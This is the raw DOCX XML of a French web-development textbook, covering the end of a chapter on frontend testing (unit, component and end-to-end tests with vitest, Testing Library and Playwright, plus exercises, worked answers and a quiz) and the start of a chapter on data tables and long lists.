            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Découper en scénarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2962"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sélecteur cassé</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Classe CSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rôle et libellé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Échec uniquement en CI</w:t>
            </w:r>
          </w:p>
        </w:tc>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Fenêtre trop petite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Viewport explicite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2962"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Capture inutilisable</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Aucune trace</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Activer la trace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LES RÉESSAIS MASQUENT L'INSTABILITÉ</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Deux réessais automatiques sauvent un pipeline, mais un test qui échoue une fois sur cinq reste un test cassé. Corrigez la cause, ne l'ignorez pas.</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TRACE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Enregistrement détaillé d'une exécution de test : captures, réseau, console. Elle permet de diagnostiquer un échec sans le reproduire.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>44.5 Couverture et discipline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La couverture indique les lignes exécutées, pas les comportements vérifiés. Une couverture de 90 % peut coexister avec un calcul faux non testé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une couverture honnête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Couverture ciblée : uniquement le code applicatif</w:t>
        <w:br/>
        <w:t>npx vitest run --coverage \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --coverage.include='src/**' \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --coverage.exclude='**/*.test.js' \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --coverage.thresholds.lines=70</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.152 — Cinq pratiques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09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Pratique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Piège</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Un test par défaut corrigé</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Non-régression</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Test trop précis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Données de test explicites</w:t>
            </w:r>
          </w:p>
        </w:tc>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Lisibilité</w:t>
            </w:r>
          </w:p>
        </w:tc>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Duplication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Horloge injectée</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Déterminisme</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Oubli dans un test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Réseau simulé</w:t>
            </w:r>
          </w:p>
        </w:tc>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Rapidité</w:t>
            </w:r>
          </w:p>
        </w:tc>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Réalisme réduit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Test de parcours unique</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Confiance</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Lenteur</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ÉCRIRE DES TESTS UTILES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Commencer par le comportement attendu.</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 test unitaire par cas limite identifié.</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Tester les composants par rôle et libellé.</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Réserver le bout en bout aux parcours critiques.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Corriger un test instable, ne pas le relancer.</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Trois niveaux de test, trois coûts et trois confiances.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pyramide réserve le bout en bout aux parcours critiques.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test unitaire vérifie un comportement, pas une implémentation.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test d'interface s'appuie sur les rôles et les libellés.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composant accessible est plus facile à tester.</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attente fixe produit des tests instables.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Deux réessais ne réparent pas un test cassé.</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couverture mesure l'exécution, pas la vérification.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'interface est testée. Le volume se referme sur ses annexes : glossaire, aide-mémoire et grille d'auto-évaluation.</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44.1 — Écrire trois tests unitaires</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Une fonction calcule une remise selon le montant.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Testez le cas nominal.</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Testez la borne.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Testez l'erreur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 44.2 — Tester un composant par son interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   QUALITÉ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un formulaire affiche un message d'erreur si le champ est vide.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Rendez le composant.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Soumettez vide.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le message.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 44.3 — Stabiliser un test de bout en bout</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Un test échoue une fois sur quatre en intégration continue.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Retirez les attentes fixes.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Attendez un état visible.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Activez la trace.</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44.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>export function remise(montant) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (montant &lt; 0) throw new RangeError("montant négatif");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (montant &gt;= 10000) return 0.15;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (montant &gt;= 5000) return 0.10;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return 0;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>it("applique 10 % à partir de 50 €", () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  expect(remise(5000)).toBe(0.10);</w:t>
        <w:br/>
        <w:t>});</w:t>
        <w:br/>
        <w:br/>
        <w:t>it("applique 15 % à partir de 100 €", () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  expect(remise(10000)).toBe(0.15);</w:t>
        <w:br/>
        <w:t>});</w:t>
        <w:br/>
        <w:br/>
        <w:t>it("refuse un montant négatif", () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  expect(() =&gt; remise(-1)).toThrow(RangeError);</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Testez les bornes exactes : ce sont les cas où les erreurs se cachent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un test d'erreur vérifie aussi que l'erreur est du bon type.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 44.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>it("affiche une erreur quand le champ est vide", async () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  render(FormulaireInscription());</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  await userEvent.click(screen.getByRole("button", { name: /s'inscrire/i }));</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  expect(screen.getByRole("alert").textContent).toMatch(/adresse requise/i);</w:t>
        <w:br/>
        <w:t>});</w:t>
        <w:br/>
        <w:br/>
        <w:t>it("n'affiche pas d'erreur avec une adresse valide", async () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  render(FormulaireInscription());</w:t>
        <w:br/>
        <w:t xml:space="preserve">  await userEvent.type(screen.getByLabelText(/adresse électronique/i),</w:t>
        <w:br/>
        <w:t xml:space="preserve">                       "a@exemple.fr");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  await userEvent.click(screen.getByRole("button", { name: /s'inscrire/i }));</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  expect(screen.queryByRole("alert")).toBeNull();</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>getByRole("alert")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> vérifie aussi que le message est annoncé aux lecteurs d'écran.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>queryByRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> renvoie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> au lieu d'échouer : utile pour vérifier une absence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 44.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>// Fragile</w:t>
        <w:br/>
        <w:t>await page.click("#valider");</w:t>
        <w:br/>
        <w:t>await page.waitForTimeout(2000);</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Robuste</w:t>
        <w:br/>
        <w:t>await page.getByRole("button", { name: /valider/i }).click();</w:t>
        <w:br/>
        <w:t>await expect(page.getByRole("heading", { name: /confirmation/i })).toBeVisible();</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Et dans la configuration</w:t>
        <w:br/>
        <w:t>// use: { trace: "on-first-retry", screenshot: "only-on-failure" }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>waitForTimeout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> attend une durée arbitraire : trop courte, le test échoue ; trop longue, il ralentit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Attendre un état visible est à la fois plus rapide et plus fiable.</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 niveau de test coûte le plus cher à maintenir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Unitaire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Intégration</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Bout en bout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Aucun</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 doit vérifier un test unitaire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L'implémentation</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 comportement observable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Les classes CSS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 nombre de lignes</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Quel sélecteur est le plus robuste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Classe CSS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Identifiant généré</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Rôle et nom accessible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Position</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 xml:space="preserve">Pourquoi éviter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>waitForTimeout</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Trop rapide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Dépend d'une durée arbitraire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Non supporté</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Trop précis</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 mesure la couverture de code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La qualité des tests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Les lignes exécutées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 nombre de bugs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La vitesse</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C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Il traverse un vrai navigateur et dépend de l'ensemble du système.</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Un test lié à l'implémentation bloque le refactoring.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3. C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Il suit ce que l'utilisateur perçoit.</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Il produit des échecs intermittents ou des tests lents.</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Elle ne dit rien de la pertinence des assertions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>45. Tableaux de données et listes longues</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Afficher, trier et filtrer des centaines de lignes sans perdre ni l'accessibilité ni la fluidité.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Avancé · Prérequis : chapitre 44</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Choisir entre tableau et liste.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Rendre un tableau triable et accessible.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Filtrer sans bloquer l'interface.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Afficher un grand volume sans ralentir.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Prévoir les états vides et les erreurs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>45.1 Tableau ou liste ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un tableau sert à comparer des valeurs sur plusieurs colonnes. Une liste sert à parcourir des objets. Utiliser un tableau pour trois champs et deux lignes alourdit la lecture sur mobile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.153 — Quatre besoins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Besoin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="270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Structure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Raison</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Comparer des montants</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2704"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tableau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Alignement des colonnes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Parcourir des articles</w:t>
